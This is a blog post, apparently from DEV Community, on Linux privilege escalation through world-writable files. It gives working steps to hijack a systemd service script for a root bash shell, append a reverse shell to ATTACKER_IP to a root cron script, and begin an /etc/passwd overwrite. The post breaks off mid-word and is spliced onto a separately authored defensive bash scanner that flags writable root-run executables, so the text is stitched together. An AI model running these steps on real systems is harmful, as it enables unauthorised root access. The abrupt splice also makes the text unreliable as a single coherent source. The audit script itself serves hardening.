Day 29: Writable File Exploitation — Turning "Bad Permissions" into Root Shells 🕵️♂️

Source: DEV Community
🛠️ The "Writable-to-Root" Pipeline

1. The Systemd Service Hijack

I audited a custom service file in /etc/systemd/system/app.service.

The Flaw: The ExecStart pointed to /opt/app.py, which was world-writable (-rwxrwxrwx).

The Exploit: `echo 'import os; os.system("/bin/bash")' > /opt/app.py`

The Trigger: `systemctl restart app`. Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges.

2. The Cron Job Injection

Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute.

The Exploit: Appending a reverse shell one-liner: `echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh`

The Result: Within 60 seconds, the system automatically pushed a root shell to my listener.

3. Overwriting /etc/passwd (The Nuclear Option)

In rare, critical misconfigurations where /etc/passwd is world-writable:

The Exploit: Create a new user hash: `openssl passwd -1 mypassword`.

The Inj
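The first two findings share one root cause: something that runs as root executes a file that an unprivileged user can modify. The audit below is an added example (my own, not code from the original post) that finds that condition before an attacker does: it pulls every absolute path off the Exec*= lines of systemd unit files and off the command field of /etc/crontab, and flags any path that is world-writable or that sits in a world-writable directory without the sticky bit (a replaceable file is as bad as a writable one). The functions take the files to scan as arguments so they can be pointed at constructed fixtures; `--scan` runs them against the real system locations. The unit and crontab contents in the usage note are constructed, not taken from any real host.

```shell
#!/usr/bin/env bash
# Added audit example, not from the original post. Flags executables that
# systemd units and the system crontab run as root but which an unprivileged
# user could modify or replace. Pass "--scan" to check the real system paths;
# otherwise the functions are only defined, so fixtures can be passed in.

# Exit 0 when PATH is world-writable. For directories, the sticky bit is
# exempted (as in /tmp), because it stops other users replacing the file.
is_world_writable() {
  local path="$1"
  [ -e "$path" ] || return 1
  if [ -d "$path" ]; then
    [ -n "$(find "$path" -maxdepth 0 -perm -002 ! -perm -1000 2>/dev/null)" ]
  else
    [ -n "$(find "$path" -maxdepth 0 -perm -002 2>/dev/null)" ]
  fi
}

# Print every absolute path on the Exec*= lines of a unit file, one per line.
# "ExecStart=/usr/bin/python3 /opt/app.py" yields both tokens, so the script
# handed to an interpreter is checked as well as the interpreter itself.
# systemd's prefix characters (-, @, +, !, :) are stripped first.
unit_exec_targets() {
  grep -E '^Exec(Start|StartPre|StartPost|Reload|Stop|StopPost)=' "$1" 2>/dev/null \
    | sed -E 's/^[^=]*=//; s/^[-@+!:]+//' \
    | tr ' ' '\n' | grep -E '^/' || true
}

# Print every absolute path in the command field of system-crontab lines
# (min hour dom mon dow user command...). Comments, blank lines and
# VAR=value assignments are skipped; @reboot-style lines start at field 3.
# Deliberately over-inclusive: every absolute path on the line is checked.
cron_targets() {
  grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$1" 2>/dev/null \
    | awk '{ start = ($1 ~ /^@/) ? 3 : 7
             for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i }' || true
}

# Usage: audit_writable_targets CRONTAB UNITFILE...
# Prints one "WRITABLE <kind> <path>" line per finding; returns 1 if any.
audit_writable_targets() {
  local crontab="$1"; shift
  local found=0 unit path
  for unit in "$@"; do
    for path in $(unit_exec_targets "$unit"); do
      if is_world_writable "$path" || is_world_writable "$(dirname "$path")"; then
        echo "WRITABLE unit:$(basename "$unit") $path"; found=1
      fi
    done
  done
  for path in $(cron_targets "$crontab"); do
    if is_world_writable "$path" || is_world_writable "$(dirname "$path")"; then
      echo "WRITABLE cron $path"; found=1
    fi
  done
  return $found
}

# Real-system scan (needs read access to the unit files and crontab).
if [ "${1:-}" = "--scan" ]; then
  audit_writable_targets /etc/crontab /etc/systemd/system/*.service
fi
```

To try it on a constructed fixture, write a unit containing `ExecStart=/usr/bin/python3 /tmp/fixture/opt/app.py` and a crontab line `* * * * * root /tmp/fixture/opt/cleanup.sh`, `chmod 777` the script, and call `audit_writable_targets /tmp/fixture/crontab /tmp/fixture/app.service`; the script is reported and the function exits 1, which makes it usable as a failing check in a hardening pipeline. The remediation each finding points at is the same: `chown root:root` and `chmod 755` on the script, and no world-writable parent directory on its path.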